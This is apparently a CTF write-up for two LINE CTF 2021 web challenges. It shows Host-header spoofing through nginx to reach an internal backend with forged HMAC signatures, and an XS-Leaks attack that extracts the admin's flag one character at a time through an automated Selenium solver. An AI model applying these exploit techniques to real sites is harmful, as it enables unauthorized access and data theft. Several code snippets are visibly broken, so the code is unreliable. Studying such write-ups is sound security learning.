Published At:
Updated At:

LINE CTF 2021 Writeup ([Web] diveinternal, Your Note) - [English]

CTFHost SpoofingNginxPythonSSRFWeb SecurityWriteupXS-Leaks
Revision History
  • Fix typo. (#ebc933c by 8ayac)

Hello, this is 8ayac🧽 This article is a two-question Writeup solved in LINE CTF 2021. The problems I solved are diveinternal and Your Note1.

Since freshness is essential for gratitude, apology, and Writeup, the content is simple without a detailed explanation. 2 Please note that the explanation is basically for those who know the problem's content, and the context is largely omitted.


[Web 50pts] diveinternal (65/680 Solves)


Target the server's internal entries, access admin, and rollback.

Keytime: Asia/Japan



A scan of the distributed nginx.conf with gixy revealed a flawed configuration. Specifically, it was vulnerable to the host header forgery 3. Below are the actual scan results by gixy.

$ gixy nginx/nginx.conf

==================== Results ===================

>> Problem: [host_spoofing] The proxied Host header may be spoofed.
Description: In most cases "$host" variable are more appropriate, just use it.
Additional info:
Pseudo config:

server {
        server_name nginx;

        location / {
                proxy_set_header Host $http_host;

==================== Summary ===================
Total issues:
    Unspecified: 0
    Low: 0
    Medium: 1
    High: 0

Next, it turned out that the vulnerability caused by this Nginx config could be used to access the back-end app directly. Specifically, I could issue an arbitrary HTTP request (But it's only the GET method4).

The URL to which the request is forwarded can be freely specified to some extent, as shown below.

  • Scheme: Unconfirmed (this time it is enough to use http)
  • Host (including port): In a legitimate request that occurs on a vulnerable endpoint, if you rewrite the value of the header Host, that value becomes the host part of the forward URL.
  • Path + query string: In a legitimate request that occurs on a vulnerable endpoint, if you rewrite the value of the header Lang, it becomes the path of the URL to which you are forwarding.5

After that, I organized the specifications of the back-end application and just did a puzzle. For details, refer to Solver described later.

Notes on backend app specifications

class Activity in app.main

Instance variables

engineDB operation engineDBMS is SQLite
sessionDB session object
dbHashDB integrity verification hashhashlib.md5(open(os.environ['DBFILE'], 'rb').read())).hexdigest()
integrityKeyKey for verifying the integrity of dbHashhashlib.sha512((self.dbHash).encode('ascii')).hexdigest()
subscriberObjsList of pre-existing Subscriber objects


__init__(self)Just a constructor
DbBackupRunner (self)Perform DB rollbackUsing app.rollback ()
Commit(self)Commi data to DBThis is called if commit fails
UpdateKey(self)Update self.integrityKey and self.dbHash properly
IntegrityCheckWorker(self)The worker to perform "IntegrityCheck" of DB file using self.dbHashUsed for regular runs by
IntegrityCheck(self, key, dbHash)Use the argument dbHash to verify that the DB has not been unintentionally changed.The contents of FLAG are read and returned when an unintended change is detected. (???)
AddSubscriber(self, email)Register new Subscriber data in DBMore information about Subscriber: app.datamodel.Subscriber
ScheduleWorkerWorker which periodically executes DB Integrity Check
runPeriodically execute DB Integrity Check

Utilities in app.main

valid_download(src)Verify if src is specified
WriteFile(url)Writes the content of the page specified by the argument to file X.File X: fbackup/${url.split('/')[-1]}
LanguageNomarize(request)Normalize the value of request header LangAfter normalizing, throw a GET request to f${request.host_url}{language}. If the response code for the request is 200, the response body string is returned.
SignCheck(request)Perform HMAC verification on the query string of the requesUsed in GET /rollback and GET or POST /rollback.

Utilities in app.rollback

RunRollbackDB(dbhash)Roll back the DBUnder backup/, if there is a file with the name of the argument dbhash with all symbol removed, it will (strangely) read and return the contents of FLAG.
RunbackupDB(remove, dbhash)Ommited


GET /indexTop Page
GET /enOmmited
GET /jpOmmited
GET /coinAPI to return coin price informationThe value of the response header Lang has been normalized by app.main.LanguageNomarize(request).
GET /downloadDownload the URL specified by the parameter srcUse to download
POST /downloadSame as GET / download
GET /addsubAPI for new Subscriber registration
GET /integrityStatusAPI for checking DB integrity statusYou can get the DB file path and the value of the current DB consistency verification hash(dbHash).
GET /rollbackAPI for DB rollbackIf you pass app.main.SignCheck (request), app.main.Activity.IntegrityCheck will be executed. The value of the request header Key is passed as the argument key. The value of dbhash specified in the query string is passed to the argument dbHash.


import hashlib
import hmac
import json
from urllib.parse import urljoin

import requests

PRIVATE_HOST = 'localhost:5000'

PRIVATE_KEY = b"let'sbitcorinparty"

def get_db_hash() -> str:
    res = requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                           'Host': PRIVATE_HOST,
                           'Lang': 'integrityStatus'
    return json.loads[res.headers['lang']]('dbhash')

def generate_sign(s: str) -> str:
    return, s.encode(), hashlib.sha512).hexdigest()

def generate_key(s: str) -> str:
    return hashlib.sha512(s.encode('ascii')).hexdigest()

def add_prefix(s: str, prefix: str) -> str:
    return f'{prefix}{s}'

def execute_download(srcUrl: str) -> requests.Response:
    sign = generate_sign(f'src={srcUrl}')
    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                            'Host': PRIVATE_HOST,
                            'Lang': f'download?src={srcUrl}',
                            'Sign': sign

def execute_rollback(dbHash: str) -> requests.Response:
    FRAGMENT = '_'

    key = generate_key(dbHash)
    sign = generate_sign(f'dbhash={add_prefix(dbHash, FRAGMENT)}')

    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                            'Host': PRIVATE_HOST,
                            'Lang': f'rollback?dbhash={add_prefix(dbHash, FRAGMENT)}',
                            'Key': key,
                            'Sign': sign

def exploit():
    res = execute_rollback(get_db_hash())

    print(f'flag: {res.headers["lang"]}')

if __name__ == "__main__":



[Web 50pts] Your Note (22/680 Solves)


Secure private note service
※ Admin have disabled some security feature of their browser...

Flag Format: LINECTF{[a-z0-9-]+}



The next part of the GET /search source code looked suspicious.

def search():
    q = request.args.get('q')
    download = request.args.get('download') is not None
    if q:
        notes = Note.query.filter_by(owner=current_user).filter(or_('%{q}%'),'%{q}%'))).all()
        if notes and download:
            return Response(json.dumps(NoteSchema(many=True).dump(notes)), headers={'Content-disposition': 'attachment;filename=result.json'})
        return redirect(url_for('index'))
    return render_template('index.html', notes=notes, is_search=True)

Looking at lines 8-9, you can see that Content-disposition: attachment is included in the response header when all of the following conditions are met.

  • Have one or more Notes
  • request.args.get('download') is not None

In short, after giving ?download= as the query string, the result of executing the search function is divided as follows.

Count of NotesThere's Content-disposition: attachment
One or more
Less than one

I expected we could obtain that flag with XS Leaks, which uses this property as an oracle. When I reported the URL {{BASE_URL}}/search?q=%&download 6 to the administrator, I got an unusual message ofng, so this prediction was correct.


Using the Solver below, I extracted the flag string character by character from the beginning.7

import os
import string
import subprocess
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import quote, urljoin

from selenium import webdriver
from import Options

BASE_URL = os.getenv('BASE_URL')

USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')

S = string.ascii_lowercase + string.digits + '-'

FLAG_SUF = '}'

def length_is(n: int) -> str:
    return f'{FLAG_PRE}{"_" * n}{FLAG_SUF}'

def nth_char_is(n: int, c: str) -> str:
    return f'{FLAG_PRE}{"_" * (n - 1)}{c}%{FLAG_SUF}'

def prop_holds(prop: str):
    print(f"\r[info] Attempting this prop => '{prop}'\033[0K", end='')

    options = Options()
    driver = webdriver.Chrome(os.getenv('CHROME_DRIVER_PATH'), options=options)
        # Login
        driver.get(urljoin(BASE_URL, '/login'))

        # Move to /report
        report_bug_button = driver.find_element_by_css_selector('')

        # Proof of work
        pow_cmd = driver.find_element_by_tag_name('strong').get_attribute('textContent').split('&&')[-1].strip()
        proof = subprocess.check_output(pow_cmd, shell=True).decode()

        # Make the payload
        payload = urljoin(BASE_URL, f'/search?q={prop}&download=')

        # Submit the payload
            '#content > div > div > > form > div:nth-child(4) > p > button').submit()

        # Check the result
        flash_message_el = driver.find_element_by_css_selector(
            '#content > div > div > > form > div:nth-child(6)')
        truth = flash_message_el.get_attribute('textContent').strip() == 'ng'

        return prop, truth

    except Exception as e:
        return prop, False


def backup(revealed_flag: str):
    with open('flag.bak', mode='w') as f:

if __name__ == "__main__":
    with ThreadPoolExecutor(max_workers=8) as executor:
        upper_bound = 50
        props = [length_is(i) for i in range(1, upper_bound + 1)]
        secret_length = [v[0].count('_') for i, v in enumerate(list(, props))) if v[1]].pop()

    print(f'\r[+] secret_length: {secret_length}\033[0K')

    secret = ''
    for i in range(1, secret_length + 1):
        with ThreadPoolExecutor(max_workers=4) as executor:
            props = [nth_char_is(i, c) for c in S]
            possible_chars = [v for v in, props) if v[1]]
            if len(possible_chars) == 1:
                secret += possible_chars.pop()[0].lstrip(f'{FLAG_PRE}{"_" * (i - 1)}').rstrip(f'%{FLAG_SUF}')
                secret += '?'

            print(f'\r[+] ~N={i} => {secret}\033[0K')

    print(f'[*] flag: {FLAG_PRE}{secret}{FLAG_SUF}')





I solved this with my teammate @y0d3n.


I feel that there is a relatively good way to put out a simple Writeup for the time being and give a detailed explanation at the review's timing.


I didn't investigate if we could issue other method requests because it was enough to get the flag if there was a GET request.


After being forwarded, it may be normalized using app.main.LanguageNomarize (request).


% is a wildcard that represents a string of 0 or more characters


Actually, the manual leak by teammate @y0d3n was faster, but from a privacy point of view, instead of his face photo, The Solver script by Python is posted.